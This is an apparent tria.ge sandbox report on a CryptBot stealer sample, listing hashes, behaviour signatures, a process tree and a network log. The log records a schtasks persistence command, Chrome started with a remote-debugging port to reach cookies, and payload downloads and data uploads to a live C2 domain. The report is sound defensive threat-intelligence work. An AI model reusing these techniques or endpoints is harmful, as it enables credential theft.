Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 08:56 UTC

General

  • Target

    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe

  • Size

    4.2MB

  • MD5

    389910a7e7b0be062240be06d7ce5d31

  • SHA1

    6c7f61dd43e11c3b5ee5bd21914ae5a9875adc7f

  • SHA256

    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1

  • SHA512

    231c854c70859b52f000f0a374d63077dfb00ee3af1ceabc76e53ffb289008d4a94df7dd0c6ab7482ca350ee6ee8f9ca79b20881534295a6ab7a0bfe545d66a0

  • SSDEEP

    98304:Va6kKK3wPgdgFfIlJgQGhx2jNyvJE0OzSDyQFRLnuYvb6HTjUwKnISeC:06kfwPytGhAjNsEpoyQFduYvbOX9KnID

Malware Config

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
    "C:\Users\Admin\AppData\Local\Temp\f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
      2⤵
      • Uses browser remote debugging
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6719758,0x7fef6719768,0x7fef6719778
        3⤵
          PID:2684
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          3⤵
            PID:2040
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:2
            3⤵
              PID:2892
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:8
              3⤵
                PID:2952
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:8
                3⤵
                  PID:320
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2220 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:1
                  3⤵
                  • Uses browser remote debugging
                  PID:2652
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2228 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:1
                  3⤵
                  • Uses browser remote debugging
                  PID:2096
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:2
                  3⤵
                    PID:944
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2900 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:1
                    3⤵
                    • Uses browser remote debugging
                    PID:2224
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2908
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  2⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2232
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 960
                  2⤵
                  • Program crash
                  PID:3028
              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                1⤵
                  PID:2972
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {FB511ADD-ACC5-45A6-8642-056FCE0E9033} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
                  1⤵
                    PID:2016
                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1636

                  Network

                  • flag-us
                    DNS
                    home.fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    home.fvtekk5pn.top
                    IN A
                    Response
                    home.fvtekk5pn.top
                    IN A
                    34.116.198.130
                  • flag-us
                    DNS
                    home.fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    home.fvtekk5pn.top
                    IN AAAA
                    Response
                  • flag-pl
                    GET
                    http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    34.116.198.130:80
                    Request
                    GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
                    Host: home.fvtekk5pn.top
                    Accept: */*
                    Response
                    HTTP/1.1 200 OK
                    server: nginx/1.22.1
                    date: Thu, 21 Nov 2024 08:56:21 GMT
                    content-type: application/octet-stream
                    content-length: 10815536
                    content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
                    last-modified: Tue, 19 Nov 2024 12:29:07 GMT
                    cache-control: no-cache
                    etag: "1732019347.4431374-10815536-3919321515"
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN A
                    Response
                    fvtekk5pn.top
                    IN A
                    34.116.198.130
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN AAAA
                    Response
                  • flag-pl
                    POST
                    http://fvtekk5pn.top/v1/upload.php
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    34.116.198.130:80
                    Request
                    POST /v1/upload.php HTTP/1.1
                    Host: fvtekk5pn.top
                    Accept: */*
                    Content-Length: 462
                    Content-Type: multipart/form-data; boundary=------------------------niJA6oqvRota9edjjrcs0p
                    Response
                    HTTP/1.1 200 OK
                    server: nginx/1.24.0 (Ubuntu)
                    date: Thu, 21 Nov 2024 08:57:09 GMT
                    content-type: text/plain; charset=utf-8
                    content-length: 2
                    etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN A
                    Response
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN AAAA
                    Response
                    fvtekk5pn.top
                    IN A
                    34.116.198.130
                  • flag-pl
                    POST
                    http://fvtekk5pn.top/v1/upload.php
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    34.116.198.130:80
                    Request
                    POST /v1/upload.php HTTP/1.1
                    Host: fvtekk5pn.top
                    Accept: */*
                    Content-Length: 69508
                    Content-Type: multipart/form-data; boundary=------------------------7nA8sk7IXLNz3KSd2nWvef
                    Response
                    HTTP/1.1 200 OK
                    server: nginx/1.24.0 (Ubuntu)
                    date: Thu, 21 Nov 2024 08:57:11 GMT
                    content-type: text/plain; charset=utf-8
                    content-length: 2
                    etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                  • flag-us
                    DNS
                    www.google.com
                    chrome.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    172.217.16.228
                  • flag-gb
                    GET
                    https://www.google.com/async/ddljson?async=ntp:2
                    chrome.exe
                    Remote address:
                    172.217.16.228:443
                    Request
                    GET /async/ddljson?async=ntp:2 HTTP/2.0
                    host: www.google.com
                    sec-fetch-site: none
                    sec-fetch-mode: no-cors
                    sec-fetch-dest: empty
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                    accept-encoding: gzip, deflate, br
                    accept-language: en-US,en;q=0.9
                  • flag-gb
                    GET
                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                    chrome.exe
                    Remote address:
                    172.217.16.228:443
                    Request
                    GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                    host: www.google.com
                    x-client-data: CKbpygE=
                    sec-fetch-site: cross-site
                    sec-fetch-mode: no-cors
                    sec-fetch-dest: empty
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                    accept-encoding: gzip, deflate, br
                    accept-language: en-US,en;q=0.9
                  • flag-gb
                    GET
                    https://www.google.com/async/newtab_promos
                    chrome.exe
                    Remote address:
                    172.217.16.228:443
                    Request
                    GET /async/newtab_promos HTTP/2.0
                    host: www.google.com
                    sec-fetch-site: cross-site
                    sec-fetch-mode: no-cors
                    sec-fetch-dest: empty
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                    accept-encoding: gzip, deflate, br
                    accept-language: en-US,en;q=0.9
                  • flag-gb
                    GET
                    https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                    chrome.exe
                    Remote address:
                    172.217.16.228:443
                    Request
                    GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                    host: www.google.com
                    sec-fetch-site: none
                    sec-fetch-mode: no-cors
                    sec-fetch-dest: empty
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                    accept-encoding: gzip, deflate, br
                    accept-language: en-US,en;q=0.9
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN A
                    Response
                  • flag-us
                    DNS
                    fvtekk5pn.top
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fvtekk5pn.top
                    IN AAAA
                    Response
                    fvtekk5pn.top
                    IN A
                    34.116.198.130
                  • flag-pl
                    POST
                    http://fvtekk5pn.top/v1/upload.php
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    Remote address:
                    34.116.198.130:80
                    Request
                    POST /v1/upload.php HTTP/1.1
                    Host: fvtekk5pn.top
                    Accept: */*
                    Content-Length: 26906
                    Content-Type: multipart/form-data; boundary=------------------------axRGjYWV86FSWJWogzI98X
                    Response
                    HTTP/1.1 200 OK
                    server: nginx/1.24.0 (Ubuntu)
                    date: Thu, 21 Nov 2024 08:57:17 GMT
                    content-type: text/plain; charset=utf-8
                    content-length: 2
                    etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                  • 34.116.198.130:80
                    http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
                    http
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    210.5kB
                    11.2MB
                    4567
                    8834

                    HTTP Request

                    GET http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

                    HTTP Response

                    200
                  • 34.116.198.130:80
                    http://fvtekk5pn.top/v1/upload.php
                    http
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    871 B
                    362 B
                    5
                    4

                    HTTP Request

                    POST http://fvtekk5pn.top/v1/upload.php

                    HTTP Response

                    200
                  • 34.116.198.130:80
                    http://fvtekk5pn.top/v1/upload.php
                    http
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    72.0kB
                    762 B
                    56
                    14

                    HTTP Request

                    POST http://fvtekk5pn.top/v1/upload.php

                    HTTP Response

                    200
                  • 172.217.16.228:443
                    https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                    tls, http2
                    chrome.exe
                    2.5kB
                    13.2kB
                    22
                    23

                    HTTP Request

                    GET https://www.google.com/async/ddljson?async=ntp:2

                    HTTP Request

                    GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                    HTTP Request

                    GET https://www.google.com/async/newtab_promos

                    HTTP Request

                    GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                  • 34.116.198.130:80
                    http://fvtekk5pn.top/v1/upload.php
                    http
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    28.1kB
                    642 B
                    24
                    11

                    HTTP Request

                    POST http://fvtekk5pn.top/v1/upload.php

                    HTTP Response

                    200
                  • 127.0.0.1:9222
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                  • 127.0.0.1:9222
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                  • 8.8.8.8:53
                    home.fvtekk5pn.top
                    dns
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    174 B
                    226 B
                    2
                    2

                    DNS Request

                    home.fvtekk5pn.top

                    DNS Request

                    home.fvtekk5pn.top

                    DNS Response

                    34.116.198.130

                  • 8.8.8.8:53
                    fvtekk5pn.top
                    dns
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    164 B
                    216 B
                    2
                    2

                    DNS Request

                    fvtekk5pn.top

                    DNS Request

                    fvtekk5pn.top

                    DNS Response

                    34.116.198.130

                  • 8.8.8.8:53
                    fvtekk5pn.top
                    dns
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    164 B
                    216 B
                    2
                    2

                    DNS Request

                    fvtekk5pn.top

                    DNS Request

                    fvtekk5pn.top

                    DNS Response

                    34.116.198.130

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    chrome.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    172.217.16.228

                  • 172.217.16.228:443
                    www.google.com
                    https
                    chrome.exe
                    2.8kB
                    6.0kB
                    5
                    6
                  • 8.8.8.8:53
                    fvtekk5pn.top
                    dns
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
                    164 B
                    216 B
                    2
                    2

                    DNS Request

                    fvtekk5pn.top

                    DNS Request

                    fvtekk5pn.top

                    DNS Response

                    34.116.198.130

                  • 127.0.0.1:50235
                    f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                    Filesize

                    264KB

                    MD5

                    f50f89a0a91564d0b8a211f8921aa7de

                    SHA1

                    112403a17dd69d5b9018b8cede023cb3b54eab7d

                    SHA256

                    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                    SHA512

                    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                    Filesize

                    16B

                    MD5

                    18e723571b00fb1694a3bad6c78e4054

                    SHA1

                    afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                    SHA256

                    8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                    SHA512

                    43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                  • memory/1636-96-0x0000000000FC0000-0x0000000000FD2000-memory.dmp

                    Filesize

                    72KB

                  • memory/1924-5-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-21-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-6-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-7-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-8-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-9-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-10-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-11-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-12-0x0000000069CC0000-0x000000006A71B000-memory.dmp

                    Filesize

                    10.4MB

                  • memory/1924-0-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-4-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-3-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-2-0x0000000000E51000-0x00000000010C9000-memory.dmp

                    Filesize

                    2.5MB

                  • memory/1924-72-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-74-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-87-0x0000000000E50000-0x0000000001A94000-memory.dmp

                    Filesize

                    12.3MB

                  • memory/1924-1-0x0000000077100000-0x0000000077102000-memory.dmp

                    Filesize

                    8KB

                  • memory/2908-90-0x00000000733C0000-0x00000000734F4000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2908-89-0x0000000000FC0000-0x0000000000FD2000-memory.dmp

                    Filesize

                    72KB

                  We care about your privacy.

                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.